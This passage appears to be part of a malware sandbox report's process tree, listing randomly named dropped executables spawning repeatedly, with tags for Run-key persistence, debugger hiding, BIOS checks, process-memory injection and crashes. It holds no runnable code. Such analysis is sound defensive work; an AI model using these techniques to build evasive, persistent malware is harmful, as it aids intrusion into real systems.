- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:3944
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:30172
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10056
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7072
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8828
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10112
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10808
- C:\Users\Admin\Documents\ur_XTg19v2pzsDItQC6DPkSl.exe
  "C:\Users\Admin\Documents\ur_XTg19v2pzsDItQC6DPkSl.exe"
  2⤵
  - Executes dropped EXE
  PID:1088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 384
    3⤵
    - Program crash
    PID:5144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 364
    3⤵
    - Program crash
    PID:6088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 400
    3⤵
    - Program crash
    PID:6296
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 620
    3⤵
    - Program crash
    PID:7208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 672
    3⤵
    - Program crash
    PID:5976
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 744
    3⤵
    - Program crash
    PID:7508
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 656
    3⤵
    - Program crash
    PID:8428
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 696
    3⤵
    - Program crash
    PID:9144
- C:\Users\Admin\Documents\3Lplz8W_r2a6BKBEeqEOZb8P.exe
  "C:\Users\Admin\Documents\3Lplz8W_r2a6BKBEeqEOZb8P.exe"
  2⤵
  - Executes dropped EXE
  PID:3840
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 660
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 680
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 636
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4440
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 700
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 848
    3⤵
    - Program crash
    PID:6620
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1056
    3⤵
    - Program crash
    PID:3556
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1232
    3⤵
    - Program crash
    PID:7928
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1268
    3⤵
    - Program crash
    PID:5908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1432
    3⤵
    - Program crash
    PID:8644
- C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe
  "C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe"
  2⤵
  - Executes dropped EXE
  PID:3836
- - C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe
    "C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe"
    3⤵
    PID:8020
- - C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe
    "C:\Users\Admin\Documents\tt851XDr8l2BAnLVZ6ppDSYX.exe"
    3⤵
    PID:5068
- C:\Users\Admin\Documents\UrFDEupTAq4XHBLoKrB5f2Vt.exe
  "C:\Users\Admin\Documents\UrFDEupTAq4XHBLoKrB5f2Vt.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Users\Admin\Documents\HkpCY1X1j86cqwtvigC9t5FV.exe
  "C:\Users\Admin\Documents\HkpCY1X1j86cqwtvigC9t5FV.exe"
  2⤵
  - Executes dropped EXE
  PID:3188
- C:\Users\Admin\Documents\p9W6JcXWZ8tle3dBsZW5Bta0.exe
  "C:\Users\Admin\Documents\p9W6JcXWZ8tle3dBsZW5Bta0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- - C:\Users\Admin\AppData\Roaming\1087562.exe
    "C:\Users\Admin\AppData\Roaming\1087562.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5772
- - C:\Users\Admin\AppData\Roaming\2066455.exe
    "C:\Users\Admin\AppData\Roaming\2066455.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5884
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:6036
- - C:\Users\Admin\AppData\Roaming\5303400.exe
    "C:\Users\Admin\AppData\Roaming\5303400.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2280
- - C:\Users\Admin\AppData\Roaming\5608748.exe
    "C:\Users\Admin\AppData\Roaming\5608748.exe"
    3⤵
    - Executes dropped EXE
    PID:6092
- - C:\Users\Admin\AppData\Roaming\4186422.exe
    "C:\Users\Admin\AppData\Roaming\4186422.exe"
    3⤵
    - Executes dropped EXE
    PID:5952
- C:\Users\Admin\Documents\1E33JDGNbjmZzxf2Q6x5i6qe.exe
  "C:\Users\Admin\Documents\1E33JDGNbjmZzxf2Q6x5i6qe.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:820
- C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
  "C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2536
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4724
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 24
      4⤵
      Program crash
      PID:4828
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    - Executes dropped EXE
    PID:4528
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3916
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    - Executes dropped EXE
    PID:5276
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    - Executes dropped EXE
    PID:5740
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    - Executes dropped EXE
    PID:5432
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:5284
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:5584
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:2104
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:5892
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6840
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6256
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7104
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4236
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7736
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7308
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7628
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8148
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8008
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:5148
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7616
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8168
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8076
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8396
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8920
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6660
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8756
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8344
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:788
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6372
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:9660
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10220
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:9816
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:9336
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6620
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10404
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10908
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10232
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10592
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:8692
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10472
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6220
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:11932
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:11312
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:7000
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4604
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:6688
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:2700
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:3020
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12300
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12732
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13148
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12692
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12952
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10396
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12928
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12564
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:10656
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13392
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13784
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14236
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13372
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14228
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:4544
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14016
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14476
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:15104
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14412
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14820
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13232
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14452
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:15788
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16116
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13264
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:15376
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12664
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14180
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:11460
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16876
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16968
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16396
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18364
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16492
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:15780
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13696
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:16300
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:14612
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18552
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18916
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19300
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18788
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19132
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18476
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19116
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:17476
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:15588
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19564
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:20036
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12748
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:19520
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:13708
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18804
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:12804
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:20208
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:18660
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:11700
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
    3⤵
    PID:21228
- - C:\Users\Admin\Documents\vT8ZMdGaJj7ECtpojGTTpGKj.exe
